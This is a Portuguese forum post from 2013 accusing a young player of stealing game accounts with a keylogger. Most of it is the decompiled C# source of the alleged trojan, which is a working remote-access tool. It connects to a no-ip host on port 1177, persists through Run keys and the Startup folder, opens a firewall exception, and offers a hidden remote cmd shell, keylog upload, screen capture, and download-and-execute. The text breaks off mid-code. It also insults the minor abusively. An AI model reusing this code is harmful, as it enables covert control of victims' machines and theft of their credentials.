ThatGuyPT 457 Posted December 26, 2013 Pastor és o maior de sempre e és um puto ranhoso com 12 anos que mal pinta. Tudo começou quando o queixoso se veio queixar que perdeu tudo o que tinha no simplesmt2 devido a um ladrão chamado pastor alemão. Que ele roubava membros já não é novidade mas desta vez usou keyloggers para isso e tendo nós o IP dele é motivo para apresentar uma queixa-crime que puna a família desse retardado mental. Ora vamos ás provas. Skype: Ou pode ser encontrado em pastebin:http://pastebin.com/ngzAPT6j Avast: Vírus que ele enviou de prova:http://ge.tt/49FiDLB1/v/0 (NÃO ABRAM, AINDA ESTÁ ACTIVO, SE ABRIREM FUNCIONA COMO UM DROPPER) Virus Scan:https://www.virustotal.com/pt/file/7b9f6d7535f7aa0283c5f7b3f9a471a457d41b8f1c1fe26b02a6795d1a959cc7/analysis/1388069807/ E o cavalo de tróia do miudo decompilado (pelo menos o dropper), como nem toda a gente é burra, estúpida, infantil e atrasada mental como ele: Fonte em C#: OK.cs // Type: ClassLibrary1.OK // Assembly: ClassLibrary1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 136249B6-9CCC-46D6-9130-51FC3F47C092 // Assembly location: C:UsersTiagoDocumentsPumaMt2_install.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.VisualBasic.Devices; using Microsoft.Win32; using System; using System.Collections.Generic; using System.Diagnostics; using System.Drawing; using System.Drawing.Imaging; using System.IO; using System.IO.Compression; using System.Net; using System.Net.Sockets; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Threading; using System.Windows.Forms; namespace ClassLibrary1 { [standardModule] internal sealed class OK { public static string VN = "QXZhc3Q="; public static string VR = "0.6.4"; public static Mutex MT = (Mutex) null; public static string EXE = "Avast.exe"; public static string DR = "TEMP"; public static string RG = "895f17b6a361b375326f1e686fac0cba"; public static string H = "servidormt2.no-ip.biz"; public static string P = "1177"; public static string Y = "|'|'|"; public static bool BD = Conversions.ToBoolean("True"); public static bool Idr = Conversions.ToBoolean("True"); public static bool IsF = Conversions.ToBoolean("True"); public static bool Isu = Conversions.ToBoolean("True"); public static FileInfo LO = new FileInfo(Application.ExecutablePath); public static Computer F = new Computer(); public static string SPL = "[endof]"; public static kl kq = (kl) null; public static bool Cn = false; public static string sf = "SoftwareMicrosoftWindowsCurrentVersionRun"; public static TcpClient C = (TcpClient) null; private static MemoryStream MeM = new MemoryStream(); private static byte[] b = new byte[5121]; private static string lastcap = ""; public static FileStream FS; private static Process Pro; static OK() { } [DllImport("psapi")] public static bool EmptyWorkingSet(long hProcess); [DllImport("ntdll")] private static int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength); [DllImport("avicap32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static bool capGetDriverDescriptionA(short wDriver, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVer, int cbVer); [DllImport("kernel32", EntryPoint = "GetVolumeInformationA", CharSet = CharSet.Ansi, SetLastError = true)] private static int GetVolumeInformation([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpRootPathName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpVolumeNameBuffer, int nVolumeNameSize, ref int lpVolumeSerialNumber, ref int lpMaximumComponentLength, ref int lpFileSystemFlags, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileSystemNameBuffer, int nFileSystemNameSize); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static IntPtr GetForegroundWindow(); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID); [DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)] public static int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength); [DllImport("user32.dll", EntryPoint = "GetWindowTextLengthA", CharSet = CharSet.Ansi, SetLastError = true)] public static int GetWindowTextLength(long hwnd); public static void DLV(string n) { try { OK.F.Registry.CurrentUser.OpenSubKey("Software" + OK.RG, true).DeleteValue(n); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public static string GTV(string n) { string str; try { str = Conversions.ToString(OK.F.Registry.CurrentUser.OpenSubKey("Software" + OK.RG).GetValue(n, (object) "")); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = ""; ProjectData.ClearProjectError(); } return str; } public static object STV(string n, string t) { object obj; try { OK.F.Registry.CurrentUser.CreateSubKey("Software" + OK.RG).SetValue(n, (object) t); obj = (object) true; } catch (Exception ex) { ProjectData.SetProjectError(ex); obj = (object) false; ProjectData.ClearProjectError(); } return obj; } public static string inf() { string str1 = "lv" + OK.Y; string str2; try { if (Operators.CompareString(OK.GTV("vn"), "", false) == 0) { string str3 = str1; string s = OK.DEB(ref OK.VN) + "_" + OK.HWD(); string str4 = OK.ENB(ref s); string str5 = OK.Y; str2 = str3 + str4 + str5; } else { string str3 = str1; string s1 = OK.GTV("vn"); string s2 = OK.DEB(ref s1) + "_" + OK.HWD(); string str4 = OK.ENB(ref s2); string str5 = OK.Y; str2 = str3 + str4 + str5; } } catch (Exception ex) { ProjectData.SetProjectError(ex); string str3 = str1; string s = OK.HWD(); string str4 = OK.ENB(ref s); string str5 = OK.Y; str2 = str3 + str4 + str5; ProjectData.ClearProjectError(); } string str6; try { str6 = str2 + Environment.MachineName + OK.Y; } catch (Exception ex) { ProjectData.SetProjectError(ex); str6 = str2 + "??" + OK.Y; ProjectData.ClearProjectError(); } string str7; try { str7 = str6 + Environment.UserName + OK.Y; } catch (Exception ex) { ProjectData.SetProjectError(ex); str7 = str6 + "??" + OK.Y; ProjectData.ClearProjectError(); } string str8 = str7 + OK.FR() + OK.Y + "" + OK.Y; string str9; try { str9 = str8 + OK.F.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "").Replace("™", "").Replace(" ", " ").Replace(" Win", "Win"); } catch (Exception ex) { ProjectData.SetProjectError(ex); str9 = str8 + "??"; ProjectData.ClearProjectError(); } string str10 = str9 + "SP"; string str11; try { string[] strArray = Strings.Split(Environment.OSVersion.ServicePack, " ", -1, CompareMethod.Binary); if (strArray.Length == 1) str10 = str10 + "0"; str11 = str10 + strArray[checked (strArray.Length - 1)]; } catch (Exception ex) { ProjectData.SetProjectError(ex); str11 = str10 + "0"; ProjectData.ClearProjectError(); } string str12; try { str12 = !Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86") ? str11 + " x86" + OK.Y : str11 + " x64" + OK.Y; } catch (Exception ex) { ProjectData.SetProjectError(ex); str12 = str11 + OK.Y; ProjectData.ClearProjectError(); } string str13 = (!OK.Cam() ? str12 + "No" + OK.Y : str12 + "Yes" + OK.Y) + OK.VR + OK.Y + ".." + OK.Y + OK.ACT() + OK.Y; string str14 = ""; try { string[] valueNames = OK.F.Registry.CurrentUser.CreateSubKey("Software" + OK.RG, RegistryKeyPermissionCheck.Default).GetValueNames(); int index = 0; while (index < valueNames.Length) { string str3 = valueNames[index]; if (str3.Length == 32) str14 = str14 + str3 + ","; checked { ++index; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return str13 + str14; } public static string FR() { string str; try { str = OK.LO.LastWriteTime.ToString("yyyy-MM-dd"); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = "unknown"; ProjectData.ClearProjectError(); } return str; } public static string ENB(ref string s) { return Convert.ToBase64String(Encoding.UTF8.GetBytes(s)); } public static string DEB(ref string s) { return Encoding.UTF8.GetString(Convert.FromBase64String(s)); } public static string RN(int c) { VBMath.Randomize(); Random random = new Random(); string str1 = ""; string str2 = "abcdefghijklmnopqrstuvwxyz"; int num1 = 1; int num2 = c; int num3 = num1; while (num3 <= num2) { str1 = str1 + Conversions.ToString(str2[random.Next(0, str2.Length)]); checked { ++num3; } } return str1; } public static byte[] SB(ref string S) { return Encoding.Default.GetBytes(S); } public static string BS(ref byte[] B) { return Encoding.Default.GetString(B); } public static Array fx(byte[] b, string spl) { List<byte[]> list = new List<byte[]>(); MemoryStream memoryStream1 = new MemoryStream(); MemoryStream memoryStream2 = new MemoryStream(); string[] strArray = Strings.Split(OK.BS(ref b), spl, -1, CompareMethod.Binary); memoryStream1.Write(b, 0, strArray[0].Length); memoryStream2.Write(b, checked (strArray[0].Length + spl.Length), checked (b.Length - strArray[0].Length + spl.Length)); list.Add(memoryStream1.ToArray()); list.Add(memoryStream2.ToArray()); memoryStream1.Dispose(); memoryStream2.Dispose(); return (Array) list.ToArray(); } public static byte[] ZIP(byte[] B, ref bool CM) { if (CM) { MemoryStream memoryStream = new MemoryStream(); GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true); gzipStream.Write(B, 0, B.Length); gzipStream.Dispose(); memoryStream.Position = 0L; byte[] buffer = new byte[checked ((int) memoryStream.Length + 1)]; memoryStream.Read(buffer, 0, buffer.Length); memoryStream.Dispose(); return buffer; } else { MemoryStream memoryStream = new MemoryStream(B); GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress); byte[] buffer = new byte[4]; memoryStream.Position = checked (memoryStream.Length - 5L); memoryStream.Read(buffer, 0, 4); int count = BitConverter.ToInt32(buffer, 0); memoryStream.Position = 0L; byte[] array = new byte[checked (count - 1 + 1)]; gzipStream.Read(array, 0, count); gzipStream.Dispose(); memoryStream.Dispose(); return array; } } public static bool Cam() { try { int num1 = 0; do { int num2 = (int) checked ((short) num1); string str1 = Strings.Space(100); // ISSUE: explicit reference operation // ISSUE: variable of a reference type string& lpszName = @str1; int cbName = 100; string str2 = (string) null; // ISSUE: explicit reference operation // ISSUE: variable of a reference type string& lpszVer = @str2; int cbVer = 100; if (OK.capGetDriverDescriptionA((short) num2, lpszName, cbName, lpszVer, cbVer)) return true; checked { ++num1; } } while (num1 <= 4); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return false; } public static string ACT() { string str1; try { IntPtr foregroundWindow = OK.GetForegroundWindow(); if (foregroundWindow == IntPtr.Zero) { string s = " "; str1 = OK.ENB(ref s); } else { int windowTextLength = OK.GetWindowTextLength((long) foregroundWindow); string str2 = Strings.StrDup(checked (windowTextLength + 1), "*"); OK.GetWindowText(foregroundWindow, ref str2, checked (windowTextLength + 1)); int lpdwProcessID; OK.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID); if (lpdwProcessID == 0) { str1 = OK.ENB(ref str2); } else { try { string mainWindowTitle = Process.GetProcessById(lpdwProcessID).MainWindowTitle; str1 = OK.ENB(ref mainWindowTitle); } catch (Exception ex) { ProjectData.SetProjectError(ex); str1 = OK.ENB(ref str2); ProjectData.ClearProjectError(); } } } } catch (Exception ex) { ProjectData.SetProjectError(ex); string s = " "; str1 = OK.ENB(ref s); ProjectData.ClearProjectError(); } return str1; } public static string HWD() { string str1; try { string str2 = Interaction.Environ("SystemDrive") + ""; // ISSUE: explicit reference operation // ISSUE: variable of a reference type string& lpRootPathName = @str2; string str3 = (string) null; // ISSUE: explicit reference operation // ISSUE: variable of a reference type string& lpVolumeNameBuffer = @str3; int nVolumeNameSize = 0; int Number; // ISSUE: explicit reference operation // ISSUE: variable of a reference type int& lpVolumeSerialNumber = @Number; int num1 = 0; // ISSUE: explicit reference operation // ISSUE: variable of a reference type int& lpMaximumComponentLength = @num1; int num2 = 0; // ISSUE: explicit reference operation // ISSUE: variable of a reference type int& lpFileSystemFlags = @num2; string str4 = (string) null; // ISSUE: explicit reference operation // ISSUE: variable of a reference type string& lpFileSystemNameBuffer = @str4; int nFileSystemNameSize = 0; OK.GetVolumeInformation(lpRootPathName, lpVolumeNameBuffer, nVolumeNameSize, lpVolumeSerialNumber, lpMaximumComponentLength, lpFileSystemFlags, lpFileSystemNameBuffer, nFileSystemNameSize); str1 = Conversion.Hex(Number); } catch (Exception ex) { ProjectData.SetProjectError(ex); str1 = "ERR"; ProjectData.ClearProjectError(); } return str1; } public static object Plugin(byte[] ByteOfPlugin, string ClassName) { Module[] modules = Assembly.Load(ByteOfPlugin).GetModules(); int index1 = 0; while (index1 < modules.Length) { Module module = modules[index1]; System.Type[] types = module.GetTypes(); int index2 = 0; while (index2 < types.Length) { System.Type type = types[index2]; if (type.FullName.EndsWith("." + ClassName)) return module.Assembly.CreateInstance(type.FullName); checked { ++index2; } } checked { ++index1; } } return (object) null; } public static void ED() { OK.pr(0); } private static bool CompDir(FileInfo F1, FileInfo F2) { if (Operators.CompareString(F1.Name.ToLower(), F2.Name.ToLower(), false) != 0) return false; DirectoryInfo directoryInfo1 = F1.Directory; DirectoryInfo directoryInfo2 = F2.Directory; while (Operators.CompareString(directoryInfo1.Name.ToLower(), directoryInfo2.Name.ToLower(), false) == 0) { directoryInfo1 = directoryInfo1.Parent; directoryInfo2 = directoryInfo2.Parent; if (directoryInfo1 == null & directoryInfo2 == null) return true; if (directoryInfo1 == null || directoryInfo2 == null) return false; } return false; } public static void INS() { if (OK.Idr) { if (!OK.CompDir(OK.LO, new FileInfo(Interaction.Environ(OK.DR).ToLower() + "" + OK.EXE.ToLower()))) { try { if (System.IO.File.Exists(Interaction.Environ(OK.DR) + "" + OK.EXE)) System.IO.File.Delete(Interaction.Environ(OK.DR) + "" + OK.EXE); System.IO.File.Copy(OK.LO.FullName, Interaction.Environ(OK.DR) + "" + OK.EXE, true); Process.Start(Interaction.Environ(OK.DR) + "" + OK.EXE); ProjectData.EndApp(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.EndApp(); ProjectData.ClearProjectError(); } } } try { Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Interaction.Shell("netsh firewall add allowedprogram "" + OK.LO.FullName + "" "" + OK.LO.Name + "" ENABLE", AppWinStyle.Hide, false, -1); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (OK.Isu) { try { OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" ..")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" ..")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } if (OK.IsF) { try { System.IO.File.Copy(OK.LO.FullName, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "" + OK.RG + ".exe", true); OK.FS = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "" + OK.RG + ".exe", FileMode.Open); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } Thread.Sleep(1000); } private static void RS(object a, object e) { try { string str1 = "rs"; string str2 = OK.Y; object Instance = e; string s = Conversions.ToString(NewLateBinding.LateGet(Instance, (System.Type) null, "Data", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)); string str3 = OK.ENB(ref s); NewLateBinding.LateSetComplex(Instance, (System.Type) null, "Data", new object[1] { (object) s }, (string[]) null, (System.Type[]) null, 1 != 0, 0 != 0); OK.Send(str1 + str2 + str3); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } private static void ex() { try { OK.Send("rsc"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public static void Ind(byte[] b) { string[] strArray1 = Strings.Split(OK.BS(ref b), OK.Y, -1, CompareMethod.Binary); try { string Left1 = strArray1[0]; if (Operators.CompareString(Left1, "proc", false) == 0) { string Left2 = strArray1[1]; if (Operators.CompareString(Left2, "~", false) == 0) { OK.Send("proc" + OK.Y + "pid" + OK.Y + Conversions.ToString(Process.GetCurrentProcess().Id)); Process[] processes = Process.GetProcesses(); OK.Send("proc" + OK.Y + "~" + OK.Y + Conversions.ToString(processes.Length)); int num = 0; string Left3 = ""; Process[] processArray = processes; int index1 = 0; while (index1 < processArray.Length) { Process process = processArray[index1]; checked { ++num; } try { try { string str = ""; try { string fileDescription = process.MainModule.FileVersionInfo.FileDescription; str = OK.ENB(ref fileDescription); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } Left3 = Left3 + OK.Y + Conversions.ToString(process.Id) + "," + process.MainModule.FileName + "," + str; } catch (Exception ex) { ProjectData.SetProjectError(ex); string[] strArray2 = new string[7] { Left3, OK.Y, Conversions.ToString(process.Id), ",", process.MainModule.FileVersionInfo.FileName, ",", null }; string[] strArray3 = strArray2; int index2 = 6; string fileDescription = process.MainModule.FileVersionInfo.FileDescription; string str = OK.ENB(ref fileDescription); strArray3[index2] = str; Left3 = string.Concat(strArray2); ProjectData.ClearProjectError(); } } catch (Exception ex1) { ProjectData.SetProjectError(ex1); string str = ""; try { string fileDescription = FileVersionInfo.GetVersionInfo(Interaction.Environ("windir") + "system32" + process.ProcessName + ".exe").FileDescription; str = OK.ENB(ref fileDescription); } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); } if (System.IO.File.Exists(Interaction.Environ("windir") + "system32" + process.ProcessName + ".exe")) { FileInfo fileInfo = new FileInfo(Interaction.Environ("windir") + "system32" + process.ProcessName + ".exe"); Left3 = Left3 + OK.Y + Conversions.ToString(process.Id) + "," + fileInfo.FullName + "," + str; } else Left3 = Left3 + OK.Y + Conversions.ToString(process.Id) + "," + process.ProcessName + "," + str; ProjectData.ClearProjectError(); } if (num == 10) { num = 0; new Thread((ParameterizedThreadStart) (a0 => OK.Send(Conversions.ToString(a0))), 1).Start((object) ("proc" + OK.Y + "!" + Left3)); Left3 = ""; } checked { ++index1; } } if (Operators.CompareString(Left3, "", false) == 0) return; OK.Send("proc" + OK.Y + "!" + Left3); } else if (Operators.CompareString(Left2, "k", false) == 0) { int num1 = 2; int num2 = checked (strArray1.Length - 1); int index = num1; while (index <= num2) { try { Process.GetProcessById(Conversions.ToInteger(strArray1[index])).Kill(); OK.Send("proc" + OK.Y + "RM" + OK.Y + strArray1[index]); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception exception = ex; OK.Send("proc" + OK.Y + "ER" + OK.Y + exception.Message); ProjectData.ClearProjectError(); } checked { ++index; } } } else if (Operators.CompareString(Left2, "kd", false) == 0) { int num1 = 2; int num2 = checked (strArray1.Length - 1); int index = num1; while (index <= num2) { try { string path = ""; Process processById = Process.GetProcessById(Conversions.ToInteger(strArray1[index])); try { path = processById.MainModule.FileVersionInfo.FileName; } catch (Exception ex1) { ProjectData.SetProjectError(ex1); try { path = processById.MainModule.FileName; } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); } ProjectData.ClearProjectError(); } processById.Kill(); OK.Send("proc" + OK.Y + "RM" + OK.Y + strArray1[index]); Thread.Sleep(2000); System.IO.File.Delete(path); OK.Send("proc" + OK.Y + "ER" + OK.Y + "Deleted " + path); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception exception = ex; OK.Send("proc" + OK.Y + "ER" + OK.Y + exception.Message); ProjectData.ClearProjectError(); } checked { ++index; } } } else { if (Operators.CompareString(Left2, "re", false) != 0) return; int num1 = 2; int num2 = checked (strArray1.Length - 1); int index = num1; while (index <= num2) { try { Process processById = Process.GetProcessById(Conversions.ToInteger(strArray1[index])); string fileName; try { fileName = processById.MainModule.FileVersionInfo.FileName; } catch (Exception ex1) { ProjectData.SetProjectError(ex1); try { fileName = processById.MainModule.FileName; } catch (Exception ex2) { ProjectData.SetProjectError(ex2); fileName = Interaction.Environ("windir") + "system32" + processById.ProcessName + ".exe"; ProjectData.ClearProjectError(); } ProjectData.ClearProjectError(); } processById.Kill(); OK.Send("proc" + OK.Y + "RM" + OK.Y + strArray1[index]); Process.Start(fileName); OK.Send("proc" + OK.Y + "ER" + OK.Y + "Started " + fileName); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception exception = ex; OK.Send("proc" + OK.Y + "ER" + OK.Y + exception.Message); ProjectData.ClearProjectError(); } checked { ++index; } } } } else if (Operators.CompareString(Left1, "rss", false) == 0) { try { OK.Pro.Kill(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } OK.Pro = new Process(); OK.Pro.StartInfo.RedirectStandardOutput = true; OK.Pro.StartInfo.RedirectStandardInput = true; OK.Pro.StartInfo.RedirectStandardError = true; OK.Pro.StartInfo.FileName = "cmd.exe"; OK.Pro.OutputDataReceived += new DataReceivedEventHandler(OK.RS); OK.Pro.ErrorDataReceived += new DataReceivedEventHandler(OK.RS); OK.Pro.Exited += (EventHandler) ((a0, a1) => OK.ex()); OK.Pro.StartInfo.UseShellExecute = false; OK.Pro.StartInfo.CreateNoWindow = true; OK.Pro.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; OK.Pro.EnableRaisingEvents = true; OK.Send("rss"); OK.Pro.Start(); OK.Pro.BeginErrorReadLine(); OK.Pro.BeginOutputReadLine(); } else if (Operators.CompareString(Left1, "rs", false) == 0) OK.Pro.StandardInput.WriteLine(OK.DEB(ref strArray1[1])); else if (Operators.CompareString(Left1, "rsc", false) == 0) { try { OK.Pro.Kill(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } OK.Pro = (Process) null; } else if (Operators.CompareString(Left1, "kl", false) == 0) OK.Send("kl" + OK.Y + OK.ENB(ref OK.kq.Logs)); else if (Operators.CompareString(Left1, "inf", false) == 0) { string str1 = "inf" + OK.Y; string str2; if (Operators.CompareString(OK.GTV("vn"), "", false) == 0) { string str3 = str1; string s = OK.DEB(ref OK.VN) + "_" + OK.HWD(); string str4 = OK.ENB(ref s); string str5 = OK.Y; str2 = str3 + str4 + str5; } else { string str3 = str1; string s1 = OK.GTV("vn"); string s2 = OK.DEB(ref s1) + "_" + OK.HWD(); string str4 = OK.ENB(ref s2); string str5 = OK.Y; str2 = str3 + str4 + str5; } OK.Send(str2 + OK.H + ":" + OK.P + OK.Y + OK.DR + OK.Y + OK.EXE + OK.Y + Process.GetCurrentProcess().ProcessName); } else if (Operators.CompareString(Left1, "prof", false) == 0) { string Left2 = strArray1[1]; if (Operators.CompareString(Left2, "~", false) == 0) OK.STV(strArray1[2], strArray1[3]); else if (Operators.CompareString(Left2, "!", false) == 0) { OK.STV(strArray1[2], strArray1[3]); OK.Send("getvalue" + OK.Y + strArray1[1] + OK.Y + OK.GTV(strArray1[1])); } else { if (Operators.CompareString(Left2, "@", false) != 0) return; OK.DLV(strArray1[2]); } } else if (Operators.CompareString(Left1, "rn", false) == 0) { byte[] bytes; if (!strArray1[2].ToLower().StartsWith("http")) { try { byte[] B = Convert.FromBase64String(strArray1[2]); bool flag = false; // ISSUE: explicit reference operation // ISSUE: variable of a reference type bool& CM = @flag; bytes = OK.ZIP(B, CM); } catch (Exception ex) { ProjectData.SetProjectError(ex); OK.Send("MSG" + OK.Y + "Execute ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); return; } } else { WebClient webClient = new WebClient(); try { bytes = webClient.DownloadData(strArray1[2]); } catch (Exception ex) { ProjectData.SetProjectError(ex); OK.Send("MSG" + OK.Y + "Download ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); return; } } OK.Send("bla"); string str = Interaction.Environ("temp") + "" + OK.RN(10) + "." + strArray1[1]; System.IO.File.WriteAllBytes(str, bytes); Process.Start(str); OK.Send("MSG" + OK.Y + "Executed As " + new FileInfo(str).Name); } else if (Operators.CompareString(Left1, "inv", false) == 0) { OK.Send("bla"); string s = OK.GTV(strArray1[1]); byte[] numArray; if (s.Length > 0) { numArray = Convert.FromBase64String(s); OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0)); } else if (strArray1[3].Length == 1) { OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + "False"); return; } else { byte[] B = Convert.FromBase64String(strArray1[3]); bool flag = false; // ISSUE: explicit reference operation // ISSUE: variable of a reference type bool& CM = @flag; numArray = OK.ZIP(B, CM); if (Conversions.ToBoolean(OK.STV(strArray1[1], Convert.ToBase64String(numArray)))) OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0)); } object objectValue = RuntimeHelpers.GetObjectValue(OK.Plugin(numArray, "A")); NewLateBinding.LateSet(objectValue, (System.Type) null, "h", new object[1] { (object) OK.H }, (string[]) null, (System.Type[]) null); NewLateBinding.LateSet(objectValue, (System.Type) null, "p", new object[1] { (object) OK.P }, (string[]) null, (System.Type[]) null); NewLateBinding.LateSet(objectValue, (System.Type) null, "osk", new object[1] { (object) strArray1[2] }, (string[]) null, (System.Type[]) null); NewLateBinding.LateCall(objectValue, (System.Type) null, "start", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true); while (!Conversions.ToBoolean(Operators.OrObject((object) (bool) (!OK.Cn ? 1 : 0), Operators.CompareObjectEqual(NewLateBinding.LateGet(objectValue, (System.Type) null, "Off", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (object) true, false)))) Thread.Sleep(1); NewLateBinding.LateSet(objectValue, (System.Type) null, "off", new object[1] { (object) true }, (string[]) null, (System.Type[]) null); } else if (Operators.CompareString(Left1, "ret", false) == 0) { OK.Send("bla"); string s1 = OK.GTV(strArray1[1]); byte[] numArray; if (s1.Length > 0) { numArray = Convert.FromBase64String(s1); OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0)); } else if (strArray1[2].Length == 1) { OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + "True"); return; } else { byte[] B = Convert.FromBase64String(strArray1[2]); bool flag = false; // ISSUE: explicit reference operation // ISSUE: variable of a reference type bool& CM = @flag; numArray = OK.ZIP(B, CM); if (Conversions.ToBoolean(OK.STV(strArray1[1], Convert.ToBase64String(numArray)))) OK.Send("pl" + OK.Y + strArray1[1] + OK.Y + Conversions.ToString(0)); } object objectValue = RuntimeHelpers.GetObjectValue(OK.Plugin(numArray, "A")); string[] strArray2 = new string[5] { "ret", OK.Y, strArray1[1], OK.Y, null }; string[] strArray3 = strArray2; int index = 4; string s2 = Conversions.ToString(NewLateBinding.LateGet(objectValue, (System.Type) null, "GT", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)); string str = OK.ENB(ref s2); strArray3[index] = str; OK.Send(string.Concat(strArray2)); } else if (Operators.CompareString(Left1, "CAP", false) == 0) { int width = Screen.PrimaryScreen.Bounds.Width; Rectangle bounds = Screen.PrimaryScreen.Bounds; int height = bounds.Height; Bitmap bitmap = new Bitmap(width, height); Graphics graphics1 = Graphics.FromImage((Image) bitmap); Graphics graphics2 = graphics1; int sourceX = 0; int sourceY = 0; int destinationX = 0; int destinationY = 0; Size size1 = new Size(bitmap.Width, bitmap.Height); Size blockRegionSize = size1; int num = 13369376; graphics2.CopyFromScreen(sourceX, sourceY, destinationX, destinationY, blockRegionSize, (CopyPixelOperation) num); try { Cursor @default = Cursors.Default; Graphics g = graphics1; // ISSUE: explicit reference operation // ISSUE: variable of a reference type Rectangle& local = @bounds; Point position = Cursor.Position; size1 = new Size(32, 32); Size size2 = size1; // ISSUE: explicit reference operation ^local = new Rectangle(position, size2); Rectangle targetRect = bounds; @default.Draw(g, targetRect); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } graphics1.Dispose(); MemoryStream memoryStream1 = new MemoryStream(); string S = "CAP" + OK.Y; b = OK.SB(ref S); memoryStream1.Write(b, 0, b.Length); MemoryStream memoryStream2 = new MemoryStream(); IntPtr callbackData; bitmap.GetThumbnailImage(Conversions.ToInteger(strArray1[1]), Conversions.ToInteger(strArray1[2]), (Image.GetThumbnailImageAbort) null, callbackData).Save((Stream) memoryStream2, ImageFormat.Jpeg); string md5Hash = OK.getMD5Hash(memoryStream2.ToArray()); if (Operators.CompareString(md5Hash, OK.lastcap, false) != 0) { OK.lastcap = md5Hash; memoryStream1.Write(memoryStream2.ToArray(), 0, checked ((int) memoryStream2.Length)); } else memoryStream1.WriteByte((byte) 0); OK.Sendb(memoryStream1.ToArray()); memoryStream1.Dispose(); memoryStream2.Dispose(); bitmap.Dispose(); } else if (Operators.CompareString(Left1, "P", false) == 0) OK.Send("P"); else if (Operators.CompareString(Left1, "un", false) == 0) { string Left2 = strArray1[1]; if (Operators.CompareString(Left2, "~", false) == 0) OK.UNS(); else if (Operators.CompareString(Left2, "!", false) == 0) { OK.pr(0); ProjectData.EndApp(); } else { if (Operators.CompareString(Left2, "@", false) != 0) return; OK.pr(0); Process.Start(OK.LO.FullName); ProjectData.EndApp(); } } else if (Operators.CompareString(Left1, "up", false) == 0) { byte[] bytes; if (!strArray1[1].ToLower().StartsWith("http")) { try { byte[] B = Convert.FromBase64String(strArray1[1]); bool flag = false; // ISSUE: explicit reference operation // ISSUE: variable of a reference type bool& CM = @flag; bytes = OK.ZIP(B, CM); } catch (Exception ex) { ProjectData.SetProjectError(ex); OK.Send("MSG" + OK.Y + "Update ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); return; } } else { WebClient webClient = new WebClient(); try { bytes = webClient.DownloadData(strArray1[1]); } catch (Exception ex) { ProjectData.SetProjectError(ex); OK.Send("MSG" + OK.Y + "Update ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); return; } } OK.Send("bla"); OK.F.Registry.CurrentUser.SetValue("di", (object) ""); string str = Interaction.Environ("temp") + "" + OK.RN(10) + ".exe"; 